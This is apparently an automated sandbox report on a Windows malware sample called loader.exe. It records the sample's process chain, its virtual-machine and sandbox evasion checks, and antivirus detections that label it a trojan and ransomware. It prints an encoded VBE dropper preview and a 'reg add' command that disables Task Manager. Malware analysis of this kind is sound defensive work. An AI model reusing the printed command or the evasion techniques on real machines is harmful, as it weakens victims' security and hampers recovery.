        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, rSCRYfRVvL4MOhUsEN.csHigh entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'DLJcyLOcsfBP0tgmPSG', 'tJYHo0O6NTgJTa2WIQq', 'G5n04SOz9M6qFk7vEWX', 'MwKFu7h0gHDKdAkt8Ps', 'xNM1pQhZ280LNpwDCQh', 'V02UpNhOt3BAj10Olto'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, qCh7AGmrbZyin7F1pXs.csHigh entropy of concatenated method names: 'ULCHhh7AGb', 'DhNqBeEcDRKs28ZM0cI', 'z6oGY9E6OeQ403Ot3Xy', 'aVBM64EMv8OGgAX4pm8', 'xYf5teE9yupVNLrwnHS', 'JgD3VEEzT9nv69qphQt', 'mdU606U0D2E7gShSt4p', 'YMHDUoUZrrSxYIMKtUs', 'AuWqGWUODMUdyiutZrd', 'IZHO4IUhPXL0dtg3nUa'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, uAjvsaqTrjr1l9NsKBY.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'A1aj6kYt8M', '_3il', 'VXkjbN4vhb', 'H8Sjmtc5qZ', '_78N', 'z3K'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, EdDjpZUyTmaorVTSv69.csHigh entropy of concatenated method names: 'pmqGvHuiKR', 'mWWGQhq4LQ', 'VlbG34tTij', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'Y0cGaWJ5RT'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, sfYaKdUxB6EWd7KPOWS.csHigh entropy of concatenated method names: 'uwBySgLwtm', 'g7aX6UXCBV4vyYBtdnY', 'T2dAXZXf56PS8sSgqOX', 'w6x9wbXTQ3wlQ05otPn', 'RN5loqXQj7AuOZeAYGi', '_1fi', 'JFG70Lyy06', '_676', 'IG9', 'mdP'
        Source: C:\Users\user\Desktop\loader.exe | File created: C:\blockcomwinsavescrt\containercomponentSaves.exe
        Source: C:\Users\user\Desktop\loader.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
        Source: containercomponentSaves.exe, 00000004.00000002.1832051997.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Memory allocated: 2D60000 memory reserve | memory write watch
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Memory allocated: 1AF10000 memory reserve | memory write watch
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Window / User API: threadDelayed 1027
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Window / User API: threadDelayed 354
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exe TID: 4208 | Thread sleep count: 1027 > 30
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exe TID: 4208 | Thread sleep count: 354 > 30
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exe TID: 3652 | Thread sleep time: -30000s >= -30000s
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exe TID: 2536 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | File Volume queried: C:\ FullSizeInformation
        Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0010A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0010A5F4
        Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0011B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0011B8E0
        Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0011DD72 VirtualQuery,GetSystemInfo,0_2_0011DD72
        Source: loader.exe, containercomponentSaves.exe.0.dr | Binary or memory string: qeMUdv2ECFZbJWRUgHp
        Source: containercomponentSaves.exe, 00000004.00000002.1832051997.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: hyper-v video
        Source: containercomponentSaves.exe, 00000004.00000002.1832051997.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
        Source: wscript.exe, 00000001.00000003.1803750678.0000000002C9B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: containercomponentSaves.exe, 00000004.00000002.1835718989.000000001BEA7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\loader.exe | API call chain: ExitProcess graph end node graph_0-23589
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0012866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0012866F
        Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0012753D mov eax, dword ptr fs:[00000030h] 0_2_0012753D
        Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0012B710 GetProcessHeap,0_2_0012B710
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Process token adjusted: Debug
        Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0011F063 SetUnhandledExceptionFilter,0_2_0011F063
        Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0011F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0011F22B
        Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0011EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0011EF05
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Memory allocated: page read and write | page guard
        Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockcomwinsavescrt\DKYQpYxB0fjo0It.vbe"
        Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockcomwinsavescrt\jwlZX38GInff6rIBqWRHehXwajI.bat" "
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\blockcomwinsavescrt\containercomponentSaves.exe "C:\blockcomwinsavescrt\containercomponentSaves.exe"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0011ED5B cpuid 0_2_0011ED5B
        Source: C:\Users\user\Desktop\loader.exe | Code function: GetLocaleInfoW,GetNumberFormatW,0_2_0011A63C
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Queries volume information: C:\blockcomwinsavescrt\containercomponentSaves.exe VolumeInformation
        Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0011D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0011D5D4
        Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0010ACF5 GetVersionExW,0_2_0010ACF5
        Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Lowering of HIPS / PFW / Operating System Security Settings

        Source: C:\Windows\SysWOW64\reg.exe | Registry value created: DisableTaskMgr 1
        Source: C:\Windows\SysWOW64\reg.exe | Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

        Stealing of Sensitive Information

        Source: Yara match | File source: 00000004.00000002.1832418118.0000000013067000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.1832051997.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: containercomponentSaves.exe PID: 7008, type: MEMORYSTR

        Remote Access Functionality

        Source: Yara match | File source: 00000004.00000002.1832418118.0000000013067000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.1832051997.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: containercomponentSaves.exe PID: 7008, type: MEMORYSTR

        MITRE ATT&CK matrix columns: Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information11
        Scripting
        Valid Accounts11
        Windows Management Instrumentation
        11
        Scripting
        11
        Process Injection
        1
        Masquerading
        OS Credential Dumping1
        System Time Discovery
        Remote Services11
        Archive Collected Data
        1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Command and Scripting Interpreter
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        1
        Modify Registry
        LSASS Memory431
        Security Software Discovery
        Remote Desktop ProtocolData from Removable Media1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)21
        Disable or Modify Tools
        Security Account Manager1
        Process Discovery
        SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook141
        Virtualization/Sandbox Evasion
        NTDS141
        Virtualization/Sandbox Evasion
        Distributed Component Object ModelInput Capture2
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
        Process Injection
        LSA Secrets1
        Application Window Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
        Deobfuscate/Decode Files or Information
        Cached Domain Credentials1
        System Network Configuration Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
        Obfuscated Files or Information
        DCSync2
        File and Directory Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job23
        Software Packing
        Proc Filesystem46
        System Information Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        DLL Side-Loading
        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Source | Detection | Scanner | Label | Link
            loader.exe | 70% | ReversingLabs | ByteCode-MSIL.Trojan.Uztuby
            loader.exe | 100% | Avira | VBS/Runner.VPG
            loader.exe | 100% | Joe Sandbox ML

            Source | Detection | Scanner | Label | Link
            C:\blockcomwinsavescrt\containercomponentSaves.exe | 100% | Avira | HEUR/AGEN.1323984
            C:\blockcomwinsavescrt\DKYQpYxB0fjo0It.vbe | 100% | Avira | VBS/Runner.VPG
            C:\blockcomwinsavescrt\containercomponentSaves.exe | 100% | Joe Sandbox ML
            C:\blockcomwinsavescrt\containercomponentSaves.exe | 84% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus

            No Antivirus matches

            No Antivirus matches

            Source | Detection | Scanner | Label | Link
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
            http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe
            http://ip-api.com | 0% | URL Reputation | safe
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            ip-api.com | 208.95.112.1 | true | true | | unknown
            fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown

            Name | Malicious | Antivirus Detection | Reputation
            http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | containercomponentSaves.exe, 00000004.00000002.1832051997.00000000030AE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://ip-api.com | containercomponentSaves.exe, 00000004.00000002.1832051997.00000000030B8000.00000004.00000800.00020000.00000000.sdmp, containercomponentSaves.exe, 00000004.00000002.1832051997.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, containercomponentSaves.exe, 00000004.00000002.1832051997.00000000030BE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            IP | Domain | Country | Flag | ASN | ASN Name | Malicious
            208.95.112.1 | ip-api.com | United States | | 53334 | TUT-ASUS | true
            Joe Sandbox version: 41.0.0 Charoite
            Analysis ID: 1542823
            Start date and time: 2024-10-26 16:16:04 +02:00
            Joe Sandbox product: CloudBasic
            Overall analysis duration: 0h 4m 19s
            Hypervisor based Inspection enabled: false
            Report type: full
            Cookbook file name: default.jbs
            Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of new started processes analysed: 7
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Sample name: loader.exe
            Detection: MAL
            Classification: mal100.troj.evad.winEXE@11/4@1/1
            EGA Information:
            • Successful, ratio: 50%
            HCA Information:
            • Successful, ratio: 64%
            • Number of executed functions: 158
            • Number of non-executed functions: 95
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Stop behavior analysis, all processes terminated
            • Exclude process from analysis (whitelisted): SIHClient.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, ctldl.windowsupdate.com
            • Execution Graph export aborted for target containercomponentSaves.exe, PID 7008 because it is empty
            • Not all processes were analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • VT rate limit hit for: loader.exe
            Time | Type | Description
            10:17:11 | API Interceptor | 1x Sleep call for process: containercomponentSaves.exe modified
            Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
            208.95.112.1 | transferencia interbancaria_667553466579.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
            208.95.112.1 | SecuriteInfo.com.Trojan.MulDrop28.33962.19660.9173.exe | Get hash | malicious | XWorm | Browse | ip-api.com/line/?fields=hosting
            208.95.112.1 | New Order.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
            208.95.112.1 | fEv4R2ahiLCQa5O.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
            208.95.112.1 | PW68YarHboeikgM.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
            208.95.112.1 | General Agreement.docx.exe | Get hash | malicious | Python Stealer, Babadeda, Exela Stealer, Waltuhium Grabber | Browse | ip-api.com/json
            208.95.112.1 | transferencia interbancaria_66579.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
            208.95.112.1 | Orden de Compra No. 78986756565344657.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
            208.95.112.1 | OUTSTANDING PAYMENT STATUS 01199241024.vbs | Get hash | malicious | AgentTesla, GuLoader | Browse | ip-api.com/line/?fields=hosting
            208.95.112.1 | Circular_no_088_Annexure_pdf.html | Get hash | malicious | HTMLPhisher | Browse | ip-api.com/json/?fields=status,country,regionName,city,query
            Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
            ip-api.com | transferencia interbancaria_667553466579.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
            ip-api.com | SecuriteInfo.com.Trojan.MulDrop28.33962.19660.9173.exe | Get hash | malicious | XWorm | Browse | 208.95.112.1
            ip-api.com | New Order.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
            ip-api.com | fEv4R2ahiLCQa5O.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
            ip-api.com | PW68YarHboeikgM.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
            ip-api.com | General Agreement.docx.exe | Get hash | malicious | Python Stealer, Babadeda, Exela Stealer, Waltuhium Grabber | Browse | 208.95.112.1
            ip-api.com | transferencia interbancaria_66579.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
            ip-api.com | Orden de Compra No. 78986756565344657.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
            ip-api.com | OUTSTANDING PAYMENT STATUS 01199241024.vbs | Get hash | malicious | AgentTesla, GuLoader | Browse | 208.95.112.1
            ip-api.com | Circular_no_088_Annexure_pdf.html | Get hash | malicious | HTMLPhisher | Browse | 208.95.112.1
            fp2e7a.wpc.phicdn.net | uIBGhwqEUB.ps1 | Get hash | malicious | Meterpreter | Browse | 192.229.221.95
            fp2e7a.wpc.phicdn.net | https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20 | Get hash | malicious | HTMLPhisher, Mamba2FA | Browse | 192.229.221.95
            fp2e7a.wpc.phicdn.net | receipt folder.lnk | Get hash | malicious | Unknown | Browse | 192.229.221.95
            fp2e7a.wpc.phicdn.net | thcdVit1dX.exe | Get hash | malicious | Phorpiex | Browse | 192.229.221.95
            fp2e7a.wpc.phicdn.net | http://mychronictravel.eu.org/ | Get hash | malicious | Unknown | Browse | 192.229.221.95
            fp2e7a.wpc.phicdn.net | https://louisianalaw.us/awI1AlsoTxn2APQ3EspQ3E4RAI1AoTxnz01coTxm&c=E,1,vvMSQz5CSzvUF_pnZgRSmb_4_6IhFVsFaIdJFKN2k78xDXcVLKO_NH-275AIvCQYfKD3jL3qc4bCIgEC2N6Rr4xli-ez6GBrwxbUrVz5hy4g&typo=1 | malicious | Unknown | 192.229.221.95
            fp2e7a.wpc.phicdn.net | https://certify.us.com/D5QkoQ3Eniw4G2APQ3ED5QpQ3E4RAionz01coq01 | malicious | Unknown | 192.229.221.95
            fp2e7a.wpc.phicdn.net | https://deborahmeagher.com.de/kfOoB/ | malicious | HTMLPhisher | 192.229.221.95
            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            TUT-ASUS | transferencia interbancaria_667553466579.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
            TUT-ASUS | SecuriteInfo.com.Trojan.MulDrop28.33962.19660.9173.exe | malicious | XWorm | 208.95.112.1
            TUT-ASUS | New Order.exe | malicious | AgentTesla | 208.95.112.1
            TUT-ASUS | fEv4R2ahiLCQa5O.exe | malicious | AgentTesla | 208.95.112.1
            TUT-ASUS | PW68YarHboeikgM.exe | malicious | AgentTesla | 208.95.112.1
            TUT-ASUS | General Agreement.docx.exe | malicious | Python Stealer, Babadeda, Exela Stealer, Waltuhium Grabber | 208.95.112.1
            TUT-ASUS | eETnl6XIwn | malicious | Unknown | 208.95.112.1
            TUT-ASUS | transferencia interbancaria_66579.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
            TUT-ASUS | Orden de Compra No. 78986756565344657.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
            TUT-ASUS | OUTSTANDING PAYMENT STATUS 01199241024.vbs | malicious | AgentTesla, GuLoader | 208.95.112.1
            No context
            No context
            Process:C:\blockcomwinsavescrt\containercomponentSaves.exe
            File Type:CSV text
            Category:dropped
            Size (bytes):1498
            Entropy (8bit):5.364175471524945
            Encrypted:false
            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNCsXE4Npv:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAu
            MD5:F3E4B39D94849B092D4BB1072DD5F435
            SHA1:0D7C96B89B2901834CF0FF5EC99579B8DE65DD72
            SHA-256:BD51FDC1EF08B5BF92E800C79A01CD5783EA62FA3240505AC6AC8B5969782046
            SHA-512:C5B7C6D226EFDD26D14F55EFF6C5714ACF7452B70F29F43DC1E2BFEDA58F5883878EAFFE2B3AF060C656EA7BF99B94D9B3D3E22EF847625D5B78F60DD9DC1733
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
            Process:C:\Users\user\Desktop\loader.exe
            File Type:data
            Category:dropped
            Size (bytes):223
            Entropy (8bit):5.807795909818938
            Encrypted:false
            SSDEEP:6:GXkgwqK+NkLzWbHE08nZNDd3RL1wQJRXu7Nga1RJNdtu:GXkBMCzWLE04d3XBJYX1RS
            MD5:2B8D55BD0911A0D0A9B459BB97EAEEE2
            SHA1:636AE852B62D51447AC137871267120B8AF73D37
            SHA-256:200AFBF994D31CD86C1808C0387ED77D9B7D0E7759387F58D8DC849A7D30498C
            SHA-512:65BF05909EB291A66A8839EC52A386A82FF013A89A93BB0005BA29AFE71C4B74A03C75FDFA3282D3A0EDCC54598CEFDF58538D2B070BDDE44D31B61EA4B22C91
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Reputation:low
            Preview:#@~^xgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v,T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJ4sKm0mWshbU/m\n/1DO&NhV\p&RMq.WWvMq~;.Iun4(AlN(R(lOEBP!S~6ls/.HEAAAA==^#~@.
            Process:C:\Users\user\Desktop\loader.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1490944
            Entropy (8bit):7.192193387211187
            Encrypted:false
            SSDEEP:24576:lfX0iy3dwFTQ40aI2GP1NE4utdShDpIBUx9PWRW/+YK8bnCAt:lf0iyoTQi1a1wtStlx9sY
            MD5:59E330F176AE037DCC65EFC5F7D7859A
            SHA1:F0FBB795992BBEBF15CEDEC2F473718891EC2334
            SHA-256:8CFA942FEF671BC7A15C59E2B8A0B7AEB2139D3E2BD233B1A45DE15513560D72
            SHA-512:F844DA447AFABA1620B4F883F2D14D00011428E762357479417EC8E8F60F3F0C901D06C6ACB96CE061D53EEDFE3A9F2EDB8906A2CF449A00266FC62FE0381653
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 84%
            Reputation:low
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......>.... ........@.. .......................@............@....................................K............................ ....................................................... ............... ..H............text...D.... ...................... ..`.sdata.../.......0..................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\loader.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):164
            Entropy (8bit):4.983747816606965
            Encrypted:false
            SSDEEP:3:I5pKoDDX0YKT0XRAJArAHFDFQNBZwXD9so3KRfyM1K7eB/k+7W34hebJNAKyMhFS:I3b0nTMQsTStuH1jhRiI36BY
            MD5:460C31975A0EA04AD5A7C3730A15E570
            SHA1:E71DF06911BB1D755FA6EC7DF0B5B3C001A35554
            SHA-256:8092FB842B95A8AB9198A257585D2B8FED740B49DC013D1EB472737DABE03680
            SHA-512:3B78B82A126589DDC93A9E12777237814BED36BC135FF894B022571254F2FD3A9FAAAB0CCB30D752B11F42D537E81E92722C10FB88ED77A133AA8FFC75D4E9B1
            Malicious:false
            Reputation:low
            Preview:"C:\blockcomwinsavescrt\containercomponentSaves.exe" & reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):7.139376589302292
            TrID:
            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            • Win32 Executable (generic) a (10002005/4) 49.97%
            • Generic Win/DOS Executable (2004/3) 0.01%
            • DOS Executable Generic (2002/1) 0.01%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:loader.exe
            File size:2'040'097 bytes
            MD5:f462fd11ceda48487db07c5b70410dac
            SHA1:48010b409ab20a6a51e562d347b87abcb15dd9fe
            SHA256:4139522809118bba10441242323550ef8f00264e862a5403dab48c1c5c8ad654
            SHA512:7ba4a2fae1b0558b4a2d1a081a9f63cc0b4184a395fe58a31083bf1e6b4e597938d0ecda8d0e45d03e26a848c1ad30c75941ade6e49f4237bb70139127c72204
            SSDEEP:24576:h2G/nvxW3WCG0xfX0iy3dwFTQ40aI2GP1NE4utdShDpIBUx9PWRW/+YK8bnCAtF:hbA3rnxf0iyoTQi1a1wtStlx9sYX
            TLSH:2C957C123B5CC945E0841AB3C2BB234447FAA8526AA9E34B77F57BAD94163C37D08DC7
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..
            Icon Hash:00046a70b1290200
            Entrypoint:0x41ec40
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:1
            File Version Major:5
            File Version Minor:1
            Subsystem Version Major:5
            Subsystem Version Minor:1
            Import Hash:fcf1390e9ce472c7270447fc5c61a0c1
            Instruction
            call 00007F903D06A6F9h
            jmp 00007F903D06A10Dh
            cmp ecx, dword ptr [0043E668h]
            jne 00007F903D06A285h
